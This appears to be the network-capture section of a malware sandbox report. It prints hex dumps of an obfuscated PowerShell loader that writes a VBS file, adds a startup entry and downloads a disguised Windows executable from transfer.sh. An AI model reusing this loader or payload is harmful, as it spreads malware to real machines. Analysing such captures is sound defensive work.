:47:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:20:-:3d:-:20:-:22:-:43:-:72:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:6f:-:72:-:79:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-
2021-09-14 14:47:22 UTC	3	IN	Data Raw: 32 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 38 3a 2d 3a 34 37 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 38 3a 2d 3a 34 36 3a 2d 3a 34 38 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 33 38 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 32 30 3a 2d 3a 33 64 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 36 32 3a 2d 3a 36 63 3a 2d 3a 36 39 3a 2d 3a 36 33 3a 2d 3a 35 63 3a 2d 3a 35 32 3a 2d 3a 37 35 3a 2d 3a 36 65 3a 2d 3a 32 32 3a 2d 3a 32 65 3a 2d 3a 35 32 3a 2d 3a 36 Data Ascii: 2:-:46:-:59:-:48:-:47:-:54:-:46:-:59:-:48:-:46:-:48:-:55:-:59:-:47:-:59:-:55:-:38:-:59:-:55:-:59:-:59:-:55:-:59:-:47:-:20:-:3d:-:22:-:43:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:62:-:6c:-:69:-:63:-:5c:-:52:-:75:-:6e:-:22:-:2e:-:52:-:6
2021-09-14 14:47:22 UTC	4	IN	Data Raw: 3a 37 34 3a 2d 3a 36 38 3a 2d 3a 32 30 3a 2d 3a 32 34 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 61 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 35 3a 2d 3a 34 39 3a 2d 3a 34 38 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 32 30 3a 2d 3a 32 64 3a 2d 3a 34 65 3a 2d 3a 36 31 3a 2d 3a 36 64 3a 2d 3a 36 35 3a 2d 3a 32 30 3a 2d 3a 32 32 3a 2d 3a 35 33 3a 2d 3a 37 34 3a 2d 3a 36 31 3a 2d 3a 37 32 3a 2d 3a 37 34 3a 2d 3a 37 35 3a 2d 3a 37 30 3a 2d 3a 32 32 3a 2d 3a 32 30 3a 2d 3a 32 64 3a 2d 3a 35 36 3a 2d 3a 36 31 3a 2d 3a 36 63 3a 2d 3a 37 35 3a 2d 3a 36 35 3a 2d Data Ascii: :74:-:68:-:20:-:24:-:48:-:49:-:55:-:48:-:49:-:55:-:48:-:4a:-:49:-:55:-:48:-:55:-:59:-:55:-:55:-:49:-:48:-:59:-:49:-:55:-:49:-:55:-:48:-:49:-:20:-:2d:-:4e:-:61:-:6d:-:65:-:20:-:22:-:53:-:74:-:61:-:72:-:74:-:75:-:70:-:22:-:20:-:2d:-:56:-:61:-:6c:-:75:-:65:-
2021-09-14 14:47:22 UTC	8	IN	Data Raw: 20 48 20 3d 20 4e 6f 74 68 69 6e 67 0d 0a 27 40 0d 0a 53 65 74 2d 43 6f 6e 74 65 6e 74 20 2d 50 61 74 68 20 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 52 75 6e 5c 4e 65 77 2e 76 62 73 20 2d 56 61 6c 75 65 20 24 43 6f 6e 74 65 6e 74 0d 0a 0d 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 37 0d 0a 0d 0a 24 53 5a 58 44 43 46 56 47 42 48 4e 4a 53 44 46 47 48 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 66 65 72 48 2d 48 73 68 2f 35 6d 4c 56 35 58 2f 6e 79 75 68 48 2d 48 74 78 74 27 2e 52 65 70 6c 61 63 65 28 27 48 2d 48 27 2c 27 2e 27 29 3b 0d 0a 24 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 20 3d 20 22 32 34 3a 2d 3a 34 35 3a 2d 3a 34 34 3a 2d 3a 35 32 3a 2d 3a 34 36 3a 2d 3a 34 37 3a 2d 3a 34 38 3a 2d 3a 34 65 3a 2d 3a 34 61 3a 2d 3a Data Ascii: H = Nothing'@Set-Content -Path C:\Users\Public\Run\New.vbs -Value $Contentstart-sleep -s 7$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/5mLV5X/nyuhH-Htxt'.Replace('H-H','.');$HHHHHHHHHHHHHHHHHH = "24:-:45:-:44:-:52:-:46:-:47:-:48:-:4e:-:4a:-:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49788	144.76.136.153	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 14:47:57 UTC	11	OUT	GET /5mLV5X/nyuh.txt HTTP/1.1 Host: transfer.sh
2021-09-14 14:47:58 UTC	11	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename="nyuh.txt" Content-Length: 512724 Content-Type: text/plain; charset=utf-8 Retry-After: Tue, 14 Sep 2021 16:47:59 GMT Server: Transfer.sh HTTP Server 1.0 X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 84.17.52.51 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1631630879 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Date: Tue, 14 Sep 2021 14:47:58 GMT Connection: close
2021-09-14 14:47:58 UTC	11	IN	Data Raw: 5b 53 74 72 69 6e 67 5d 24 48 48 3d 27 34 44 35 41 39 2d 2d 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 34 2d 2d 2d 2d 2d 2d 46 46 46 46 2d 2d 2d 2d 42 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 2d 2d 2d 45 31 46 42 41 2d 45 2d 2d 42 34 2d 39 43 44 32 31 42 38 2d 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 2d 37 2d 37 32 36 46 36 37 37 32 36 31 36 44 32 2d 36 33 36 31 36 45 36 45 36 46 37 34 32 2d 36 32 36 35 32 2d 37 32 37 35 36 45 32 2d 36 39 36 45 32 2d 34 34 34 46 35 33 32 2d 36 44 36 46 36 34 36 35 32 45 2d 44 2d 44 2d 41 32 34 Data Ascii: [String]$HH='4D5A9----3-------4------FFFF----B8--------------4-----------------------------------------------------------------------8--------E1FBA-E--B4-9CD21B8-14CCD21546869732-7-726F6772616D2-63616E6E6F742-62652-72756E2-696E2-444F532-6D6F64652E-D-D-A24
2021-09-14 14:47:58 UTC	12	IN	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 32 2d 2d 2d 2d 2d 34 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 45 37 34 36 35 37 38 37 34 2d 2d 2d 2d 2d 2d 39 38 43 37 2d 31 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 43 38 2d 31 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 36 2d 32 45 37 32 36 35 36 43 36 46 36 33 2d 2d 2d 2d 2d 43 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 43 41 2d 31 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d Data Ascii: ----------------------------------------------------2------8-----------------------82-----48----------------------2E74657874------98C7-1----2-------C8-1-----2----------------------------2-----6-2E72656C6F63-----C-----------2-----2------CA-1---------------
2021-09-14 14:47:58 UTC	14	IN	Data Raw: 31 45 31 45 32 44 31 32 32 36 2d 33 31 42 31 36 32 43 2d 46 32 36 32 38 35 32 2d 2d 2d 2d 2d 41 32 38 35 33 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 43 32 36 32 42 45 46 2d 2d 2d 2d 2d 2d 31 33 33 2d 2d 33 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 43 2d 2d 2d 2d 31 31 2d 32 31 38 31 37 32 44 2d 37 32 36 32 38 35 34 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 46 37 2d 2d 31 33 33 2d 2d 31 2d 2d 2d 42 2d 2d 2d 2d 2d 2d 2d 44 2d 2d 2d 2d 31 31 44 2d 2d 35 2d 2d 2d 2d 2d 32 32 38 34 36 2d 2d 2d 2d 2d 41 32 41 2d 2d 31 33 33 2d 2d 33 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 45 2d 2d 2d 2d 31 31 2d 32 31 42 31 39 32 44 2d 37 32 36 32 38 35 35 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 46 37 2d 2d 2d 33 33 2d 2d 41 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 41 31 37 32 44 2d Data Ascii: 1E1E2D1226-31B162C-F262852-----A2853-----A2A262BEC262BEF------133--3---F-------C----11-218172D-7262854-----A2A262BF7--133--1---B-------D----11D--5-----22846-----A2A--133--3---F-------E----11-21B192D-7262855-----A2A262BF7---33--A---F---------------21A172D-
2021-09-14 14:47:58 UTC	15	IN	Data Raw: 2d 2d 2d 2d 2d 41 2d 2d 2d 2d 31 31 2d 32 31 43 31 42 32 44 2d 41 32 36 38 43 2d 38 2d 2d 2d 2d 31 42 32 44 2d 42 32 42 2d 33 32 36 32 42 46 34 32 38 2d 34 2d 2d 2d 2d 32 42 32 41 2d 32 31 36 31 35 32 44 2d 32 32 36 32 41 32 36 32 42 46 43 2d 2d 2d 2d 31 33 33 2d 2d 34 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 2d 41 2d 2d 2d 2d 31 31 2d 33 31 44 31 44 32 44 31 35 32 36 31 32 2d 2d 46 45 31 35 2d 38 2d 2d 2d 2d 31 42 2d 36 31 41 31 36 32 43 2d 41 32 36 38 31 2d 38 2d 2d 2d 2d 31 42 32 41 32 36 32 42 45 39 32 36 32 42 46 34 31 33 33 2d 2d 31 2d 2d 35 35 2d 2d 2d 2d 2d 2d 2d 46 2d 2d 2d 2d 31 31 2d 46 2d 2d 37 42 38 33 2d 2d 2d 2d 2d 34 34 35 2d 34 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 31 2d 2d 2d 2d 2d 2d 2d 31 45 2d 2d 2d 2d 2d 2d 32 43 2d 2d 2d 2d 2d 2d 32 42 33 Data Ascii: -----A----11-21C1B2D-A268C-8----1B2D-B2B-3262BF428-4----2B2A-216152D-2262A262BFC----133--4--2--------A----11-31D1D2D152612--FE15-8----1B-61A162C-A2681-8----1B2A262BE9262BF4133--1--55-------F----11-F--7B83-----445-4-------2------1-------1E------2C------2B3
2021-09-14 14:47:58 UTC	19	IN	Data Raw: 2d 33 31 37 31 35 32 44 2d 42 32 36 2d 34 36 46 36 42 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 42 32 36 32 42 46 33 2d 2d 2d 2d 2d 2d 2d 33 33 2d 2d 41 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 43 31 45 32 44 2d 41 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 32 44 2d 36 32 42 2d 33 32 36 32 42 46 34 32 41 2d 32 31 41 31 35 32 44 31 32 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 2d 33 31 36 31 38 32 44 2d 41 32 36 36 46 36 43 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 43 32 36 32 42 46 34 2d 33 33 2d 2d 41 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 37 31 45 32 44 2d 41 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 32 44 2d 36 32 42 2d 33 32 36 32 42 46 34 32 41 2d 32 31 36 31 35 32 44 31 32 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 2d 33 31 43 31 44 32 Data Ascii: -317152D-B26-46F6B-----A2A262BEB262BF3-------33--A--3----------------21C1E2D-A267B19-----42D-62B-3262BF42A-21A152D12267B19-----4-316182D-A266F6C-----A2A262BEC262BF4-33--A--3----------------2171E2D-A267B19-----42D-62B-3262BF42A-216152D12267B19-----4-31C1D2
2021-09-14 14:47:58 UTC	25	IN	Data Raw: 2d 2d 2d 41 38 2d 33 32 2d 2d 2d 2d 2d 34 32 38 41 36 2d 2d 2d 2d 2d 41 32 38 41 37 2d 2d 2d 2d 2d 41 32 38 36 42 2d 2d 2d 2d 2d 36 32 44 31 43 32 42 31 35 38 2d 34 41 2d 2d 2d 2d 2d 34 32 42 43 41 38 2d 32 41 2d 2d 2d 2d 2d 34 32 42 43 43 38 2d 32 43 2d 2d 2d 2d 2d 34 32 42 43 45 32 38 36 46 2d 2d 2d 2d 2d 36 32 38 37 32 2d 2d 2d 2d 2d 36 32 38 37 33 2d 2d 2d 2d 2d 36 32 38 37 34 2d 2d 2d 2d 2d 36 32 38 36 2d 2d 2d 2d 2d 2d 36 32 38 36 39 2d 2d 2d 2d 2d 36 32 38 36 41 2d 2d 2d 2d 2d 36 32 38 36 31 2d 2d 2d 2d 2d 36 32 38 37 37 2d 2d 2d 2d 2d 36 32 38 37 41 2d 2d 2d 2d 2d 36 32 38 37 35 2d 2d 2d 2d 2d 36 32 38 37 36 2d 2d 2d 2d 2d 36 32 38 37 38 2d 2d 2d 2d 2d 36 32 38 37 39 2d 2d 2d 2d 2d 36 32 38 37 42 2d 2d 2d 2d 2d 36 32 38 37 43 2d 2d 2d 2d 2d 36 32 Data Ascii: ---A8-32-----428A6-----A28A7-----A286B-----62D1C2B158-4A-----42BCA8-2A-----42BCC8-2C-----42BCE286F-----62872-----62873-----62874-----6286------62869-----6286A-----62861-----62877-----6287A-----62875-----62876-----62878-----62879-----6287B-----6287C-----62
2021-09-14 14:47:58 UTC	26	IN	Data Raw: 2d 2d 2d 2d 36 32 42 2d 33 2d 41 32 42 44 34 31 32 2d 31 32 38 39 38 2d 2d 2d 2d 2d 41 32 44 43 2d 44 45 2d 45 31 32 2d 31 46 45 31 36 31 32 2d 2d 2d 2d 31 42 36 46 36 33 2d 2d 2d 2d 2d 41 44 43 32 41 2d 41 2d 31 31 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 46 2d 2d 35 35 36 34 2d 2d 2d 45 2d 2d 2d 2d 2d 2d 2d 2d 31 42 33 2d 2d 33 2d 2d 32 41 2d 31 2d 2d 2d 2d 32 38 2d 2d 2d 2d 31 31 37 45 37 44 2d 2d 2d 2d 2d 34 32 2d 36 32 32 2d 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 41 38 2d 2d 2d 2d 2d 41 31 44 32 44 2d 42 32 36 2d 36 32 38 41 45 2d 2d 2d 2d 2d 41 32 44 2d 36 32 42 2d 33 2d 41 32 42 46 33 32 41 2d 36 32 38 41 46 2d 2d 2d 2d 2d 41 31 37 32 44 31 33 32 36 2d 37 32 38 32 42 2d 31 2d 2d 2d 36 31 38 32 44 2d 43 32 36 2d 38 31 33 2d 39 31 36 31 33 2d 38 32 42 Data Ascii: ----62B-3-A2BD412-12898-----A2DC-DE-E12-1FE1612----1B6F63-----ADC2A-A-11------2---F--5564---E--------1B3--3--2A-1----28----117E7D-----42-622-D-1E28FF-----628A8-----A1D2D-B26-628AE-----A2D-62B-3-A2BF32A-628AF-----A172D1326-7282B-1---6182D-C26-813-91613-82B
2021-09-14 14:47:58 UTC	33	IN	Data Raw: 2d 2d 2d 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 35 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 38 33 43 2d 31 2d 2d 2d 36 32 44 2d 31 32 41 32 38 35 37 2d 31 2d 2d 2d 36 31 38 32 44 2d 32 32 36 32 41 32 36 32 42 46 43 2d 2d 2d 2d 2d 2d 33 45 32 38 33 44 2d 31 2d 2d 2d 36 32 44 2d 31 32 41 31 37 32 38 38 36 2d 2d 2d 2d 2d 36 32 41 31 33 33 2d 2d 34 2d 2d 32 46 2d 31 2d 2d 2d 2d 33 37 2d 2d 2d 2d 31 31 32 38 33 39 2d 31 2d 2d 2d 36 33 39 32 34 2d 31 2d 2d 2d 2d 37 45 37 43 2d 2d 2d 2d 2d 34 32 44 2d 31 32 41 37 45 37 42 2d 2d 2d 2d 2d 34 32 44 2d 37 37 45 33 31 2d 2d 2d 2d 2d 34 32 42 2d 35 37 45 33 2d 2d 2d 2d 2d 2d 34 31 41 32 44 2d 44 32 36 37 45 37 42 2d 2d 2d 2d 2d 34 33 39 41 42 2d 2d 2d 2d 2d 2d 32 42 2d 33 2d 41 32 42 46 31 32 38 33 41 2d 31 2d 2d 2d 36 Data Ascii: ------33--9--15--------------283C-1---62D-12A2857-1---6182D-2262A262BFC------3E283D-1---62D-12A172886-----62A133--4--2F-1----37----112839-1---63924-1----7E7C-----42D-12A7E7B-----42D-77E31-----42B-57E3------41A2D-D267E7B-----439AB------2B-3-A2BF1283A-1---6
2021-09-14 14:47:58 UTC	40	IN	Data Raw: 46 31 39 2d 31 2d 2d 2d 41 31 37 32 44 32 43 32 36 37 45 37 45 2d 2d 2d 2d 2d 34 2d 37 32 2d 39 31 32 36 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 45 39 2d 2d 2d 2d 2d 41 32 38 41 38 2d 2d 2d 2d 2d 41 31 38 32 44 31 31 32 36 2d 36 32 38 41 45 2d 2d 2d 2d 2d 41 32 43 2d 44 32 42 2d 39 2d 43 32 42 41 44 2d 42 32 42 44 32 2d 41 32 42 45 44 44 45 33 2d 37 45 37 45 2d 2d 2d 2d 2d 34 32 38 46 35 2d 2d 2d 2d 2d 41 32 36 2d 36 31 37 38 44 37 32 2d 2d 2d 2d 2d 31 2d 44 2d 39 31 36 2d 38 41 32 2d 39 32 38 32 41 2d 31 2d 2d 2d 36 32 38 42 38 2d 2d 2d 2d 2d 41 44 45 2d 43 32 38 34 43 2d 2d 2d 2d 2d 41 32 38 36 31 2d 2d 2d 2d 2d 41 44 45 2d 2d 32 41 2d 33 2d 43 2d 31 31 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 39 38 39 2d 2d 2d 43 34 36 2d 2d 2d 2d 2d 31 31 33 Data Ascii: F19-1---A172D2C267E7E-----4-72-9126D-1E28FF-----628E9-----A28A8-----A182D1126-628AE-----A2C-D2B-9-C2BAD-B2BD2-A2BEDDE3-7E7E-----428F5-----A26-6178D72-----1-D-916-8A2-9282A-1---628B8-----ADE-C284C-----A2861-----ADE--2A-3-C-11-------------8989---C46-----113
2021-09-14 14:47:58 UTC	47	IN	Data Raw: 33 2d 31 2d 2d 2d 41 38 2d 33 45 2d 2d 2d 2d 2d 34 32 41 2d 2d 31 33 33 2d 2d 36 2d 2d 31 41 2d 2d 2d 2d 2d 2d 35 36 2d 2d 2d 2d 31 31 2d 33 2d 34 2d 35 2d 37 2d 45 2d 34 32 38 32 43 2d 31 2d 2d 2d 36 31 35 32 44 2d 39 32 36 2d 32 2d 36 36 46 41 31 2d 31 2d 2d 2d 36 32 41 2d 41 32 42 46 35 2d 2d 2d 2d 31 33 33 2d 2d 36 2d 2d 31 42 2d 2d 2d 2d 2d 2d 35 37 2d 2d 2d 2d 31 31 2d 33 2d 34 2d 35 2d 45 2d 34 2d 45 2d 35 32 38 32 43 2d 31 2d 2d 2d 36 31 39 32 44 2d 39 32 36 2d 32 2d 36 36 46 41 31 2d 31 2d 2d 2d 36 32 41 2d 41 32 42 46 35 2d 2d 31 33 33 2d 2d 36 2d 2d 33 37 2d 2d 2d 2d 2d 2d 31 37 2d 2d 2d 2d 31 31 31 34 31 37 32 44 31 2d 32 36 37 45 33 39 2d 2d 2d 2d 2d 34 2d 32 36 46 37 32 2d 2d 2d 2d 2d 41 32 43 32 34 32 42 2d 33 2d 41 32 42 45 45 37 45 33 39 Data Ascii: 3-1---A8-3E-----42A--133--6--1A------56----11-3-4-5-7-E-4282C-1---6152D-926-2-66FA1-1---62A-A2BF5----133--6--1B------57----11-3-4-5-E-4-E-5282C-1---6192D-926-2-66FA1-1---62A-A2BF5--133--6--37------17----1114172D1-267E39-----4-26F72-----A2C242B-3-A2BEE7E39
2021-09-14 14:47:58 UTC	55	IN	Data Raw: 2d 2d 2d 2d 36 32 38 46 36 2d 2d 2d 2d 2d 36 32 38 46 2d 2d 2d 2d 2d 2d 36 32 38 45 46 2d 2d 2d 2d 2d 36 36 31 32 38 45 45 2d 2d 2d 2d 2d 36 32 41 2d 2d 2d 2d 2d 33 33 2d 2d 41 2d 2d 32 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 38 31 38 32 44 31 38 32 36 2d 33 31 35 31 45 32 44 31 35 32 36 32 2d 34 41 44 38 44 39 35 33 36 36 36 36 36 35 36 35 36 36 36 36 36 35 36 36 36 35 35 39 36 31 32 41 32 36 32 42 45 36 32 36 32 42 45 39 2d 2d 2d 33 33 2d 2d 41 2d 2d 33 32 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 43 31 37 32 44 32 37 32 36 32 2d 38 44 46 43 42 33 34 45 36 36 36 35 36 36 36 35 36 36 36 36 36 35 36 35 36 36 35 39 2d 33 31 37 31 43 32 44 31 35 32 36 32 2d 45 46 44 37 46 35 43 31 36 36 36 36 36 35 36 35 36 36 36 36 36 35 36 36 36 35 Data Ascii: ----628F6-----628F------628EF-----66128EE-----62A-----33--A--23---------------218182D1826-3151E2D15262-4AD8D95366666565666665666559612A262BE6262BE9---33--A--32---------------21C172D27262-8DFCB34E66656665666665656659-3171C2D15262-EFD7F5C1666665656666656665
2021-09-14 14:47:58 UTC	62	IN	Data Raw: 32 37 42 36 33 2d 2d 2d 2d 2d 34 2d 36 2d 33 2d 36 35 39 36 46 35 43 2d 31 2d 2d 2d 41 2d 42 2d 37 32 44 2d 36 2d 32 32 38 2d 34 2d 31 2d 2d 2d 36 2d 36 2d 37 35 38 2d 41 2d 36 2d 33 33 32 44 39 32 41 2d 2d 31 33 33 2d 2d 33 2d 2d 33 35 2d 2d 2d 2d 2d 2d 36 46 2d 2d 2d 2d 31 31 2d 32 37 42 36 32 2d 2d 2d 2d 2d 34 31 41 32 44 2d 44 32 36 2d 32 31 34 31 36 32 43 2d 41 32 36 32 36 2d 36 32 43 31 32 32 42 2d 41 2d 41 32 42 46 31 37 44 36 32 2d 2d 2d 2d 2d 34 32 42 46 31 2d 36 36 46 37 39 2d 2d 2d 2d 2d 41 2d 32 31 34 31 44 32 44 2d 33 32 36 32 36 32 41 37 44 36 33 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 2d 2d 2d 31 33 33 2d 2d 36 2d 2d 36 35 2d 2d 2d 2d 2d 2d 37 2d 2d 2d 2d 2d 31 31 2d 33 31 36 32 46 2d 36 37 33 35 44 2d 31 2d 2d 2d 41 37 41 2d 33 38 44 32 32 Data Ascii: 27B63-----4-6-3-6596F5C-1---A-B-72D-6-228-4-1---6-6-758-A-6-332D92A--133--3--35------6F----11-27B62-----41A2D-D26-214162C-A2626-62C122B-A-A2BF17D62-----42BF1-66F79-----A-2141D2D-326262A7D63-----42BF8------133--6--65------7-----11-3162F-6735D-1---A7A-38D22
2021-09-14 14:47:58 UTC	69	IN	Data Raw: 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 44 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 44 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 45 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 45 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 43 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 46 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 33 32 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 31 2d 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 31 46 2d 2d 2d 2d 31 42 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 31 31 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 34 38 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d Data Ascii: F6D-1---A7E76-----4D-BD-----12846-----A1F-D6F6D-1---A7E76-----4D-BE-----12846-----A1F-E6F6D-1---A7E76-----4D-BC-----12846-----A1F-F6F6D-1---A7E76-----4D-32-----12846-----A1F1-6F6D-1---A7E76-----4D-1F----1B2846-----A1F116F6D-1---A7E76-----4D-48-----12846--
2021-09-14 14:47:58 UTC	76	IN	Data Raw: 33 2d 37 2d 33 37 42 31 35 2d 2d 2d 2d 2d 34 31 31 2d 37 32 2d 39 39 32 43 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 42 33 2d 2d 2d 2d 2d 36 32 38 36 31 2d 2d 2d 2d 2d 41 44 45 2d 2d 32 41 36 46 39 37 34 31 31 43 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 42 2d 32 2d 2d 2d 2d 33 42 2d 32 2d 2d 2d 2d 32 36 2d 2d 2d 2d 2d 2d 34 36 2d 2d 2d 2d 2d 31 31 33 33 2d 2d 34 2d 2d 35 33 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 31 31 31 36 37 45 33 41 2d 2d 2d 2d 2d 34 36 46 41 44 2d 31 2d 2d 2d 41 31 37 35 39 31 39 32 44 2d 37 32 36 31 41 32 44 2d 36 32 36 32 42 33 36 2d 43 32 42 46 37 2d 42 32 42 46 38 37 45 33 41 2d 2d 2d 2d 2d 34 2d 37 36 46 41 45 2d 31 2d 2d 2d 41 37 42 31 31 2d 2d 2d 2d 2d 34 2d 32 32 38 36 2d 2d 31 2d 2d 2d 41 32 43 2d 43 Data Ascii: 3-7-37B15-----411-72-992CD-1E28FF-----628B3-----62861-----ADE--2A6F97411C--------------------3B-2----3B-2----26------46-----1133--4--53------8-----11167E3A-----46FAD-1---A1759192D-7261A2D-6262B36-C2BF7-B2BF87E3A-----4-76FAE-1---A7B11-----4-2286--1---A2C-C
